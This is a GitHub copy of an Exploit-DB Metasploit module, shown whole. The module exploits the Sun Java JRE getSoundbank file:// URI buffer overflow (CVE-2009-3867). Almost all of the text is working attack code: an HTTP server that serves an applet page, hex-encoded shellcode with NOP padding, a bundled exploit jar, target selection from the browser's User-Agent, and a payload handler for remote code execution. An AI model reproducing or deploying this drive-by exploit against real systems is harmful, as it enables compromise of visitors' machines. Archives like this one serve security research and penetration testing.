forked from offensive-security/exploitdb
-
Notifications
You must be signed in to change notification settings - Fork 1
Expand file tree
/
Copy path16294.rb
More file actions
executable file
·235 lines (195 loc) · 5.74 KB
/
Copy path16294.rb
File metadata and controls
executable file
·235 lines (195 loc) · 5.74 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
##
# $Id: java_getsoundbank_bof.rb 10394 2010-09-20 08:06:27Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking
#
# This module acts as an HTTP server
#
include Msf::Exploit::Remote::HttpServer::HTML
def initialize(info = {})
super(update_info(info,
'Name' => 'Sun Java JRE getSoundbank file:// URI Buffer Overflow',
'Description' => %q{
This module exploits a flaw in the getSoundbank function in the Sun JVM.
The payload is serialized and passed to the applet via PARAM tags. It must be
a native payload.
The effected Java versions are JDK and JRE 6 Update 16 and earlier,
JDK and JRE 5.0 Update 21 and earlier, SDK and JRE 1.4.2_23 and
earlier, and SDK and JRE 1.3.1_26 and earlier.
NOTE: Although all of the above versions are reportedly vulnerable, only
1.6.0_u11 and 1.6.0_u16 on Windows XP SP3 were tested.
},
'License' => MSF_LICENSE,
'Author' =>
[
'kf', # Original PoC/exploit
'jduck' # metasploit version
],
'Version' => '$Revision: 10394 $',
'References' =>
[
[ 'CVE', '2009-3867' ],
[ 'OSVDB', '59711' ],
[ 'BID', '36881' ],
[ 'URL', 'http://zerodayinitiative.com/advisories/ZDI-09-076/' ]
],
'Payload' =>
{
'Space' => 1024,
'BadChars' => '',
'DisableNops' => true,
},
'Targets' =>
[
=begin
No automatic targetting for now ...
[ 'J2SE 1.6_16 Automatic',
{
'Platform' => ['win', 'linux', 'osx'],
'Arch' => [ARCH_X86, ARCH_PPC]
}
],
=end
[ 'J2SE 1.6_16 on Windows x86',
{
'Platform' => 'win',
'Arch' => ARCH_X86
}
],
[ 'J2SE 1.6_16 on Mac OS X PPC',
{
'Platform' => 'osx',
'Arch' => ARCH_PPC,
}
],
[ 'J2SE 1.6_16 on Mac OS X x86',
{
'Platform' => 'osx',
'Arch' => ARCH_X86,
}
],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Nov 04 2009'
))
end
def exploit
# load the static jar
path = File.join(Msf::Config.install_root, "data", "exploits", "CVE-2009-3867.jar")
fd = File.open(path, "rb")
@jar_data = fd.read(fd.stat.size)
fd.close
super
end
def on_request_uri(cli, req)
# Create a cached mapping between IP and detected target
@targetcache ||= {}
@targetcache[cli.peerhost] ||= {}
@targetcache[cli.peerhost][:update] = Time.now.to_i
if (target.name =~ /Automatic/)
case req.headers['User-Agent']
when /Windows/i
print_status("Choosing a Windows target for #{cli.peerhost}:#{cli.peerport}...")
@targetcache[cli.peerhost][:target] = self.targets[1]
when /PPC Mac OS X/i
print_status("Choosing a Mac OS X PPC target for #{cli.peerhost}:#{cli.peerport}...")
@targetcache[cli.peerhost][:target] = self.targets[2]
when /Intel Mac OS X/i
print_status("Choosing a Mac OS X x86 target for #{cli.peerhost}:#{cli.peerport}...")
@targetcache[cli.peerhost][:target] = self.targets[3]
else
print_status("Unknown target for: #{req.headers['User-Agent']}")
end
end
# Clean the cache
rmq = []
@targetcache.each_key do |addr|
if (Time.now.to_i > @targetcache[addr][:update]+60)
rmq.push addr
end
end
rmq.each {|addr| @targetcache.delete(addr) }
# Request processing
if (not req.uri.match(/\.jar$/i))
# Redirect to the base directory so the applet code loads...
if (not req.uri.match(/\/$/))
print_status("Sending redirect so path ends with / ...")
send_redirect(cli, get_resource() + '/', '')
return
end
# Display the applet loading HTML
print_status("Sending HTML to #{cli.peerhost}:#{cli.peerport}...")
send_response_html(cli, generate_html(payload.encoded),
{
'Content-Type' => 'text/html',
'Pragma' => 'no-cache'
})
return
end
# Send the actual applet over
print_status("Sending applet to #{cli.peerhost}:#{cli.peerport}...")
send_response(cli, generate_applet(cli, req),
{
'Content-Type' => 'application/octet-stream',
'Pragma' => 'no-cache'
})
# Handle the payload
handler(cli)
end
def generate_html(pl)
html = <<-EOF
<html>
<head>
<!-- <meta http-equiv=refresh content=10 /> -->
</head>
<body>
<applet width='100%' height='100%' code='AppletX' archive='JARNAME'>
<param name='sc' value='SCODE' />
<param name='np' value='NOPS' />
</applet>
</body>
</html>
EOF
# finalize the html
jar_name = rand_text_alphanumeric(32)
html.gsub!(/JARNAME/, jar_name)
# add payload
debug_payload = false
pload = ""
pload << "\xcc" if debug_payload
pload << pl
if ((pload.length % 4) > 0)
pload << rand_text((4 - (pload.length % 4)))
end
if debug_payload
print_status("pload #{pload.length} bytes:\n" + Rex::Text.to_hex_dump(pload))
end
html.gsub!(/SCODE/, Rex::Text.to_hex(pload, ''))
# add nops
nops = "\x90\x90\x90\x90"
html.gsub!(/NOPS/, Rex::Text.to_hex(nops, ''))
#print_status("nops #{nops.length} bytes:\n" + Rex::Text.to_hex_dump(nops))
return html
end
def generate_applet(cli, req)
this_target = nil
if (target.name =~ /Automatic/)
if (@targetcache[cli.peerhost][:target])
this_target = @targetcache[cli.peerhost][:target]
else
return ''
end
else
this_target = target
end
return @jar_data
end
end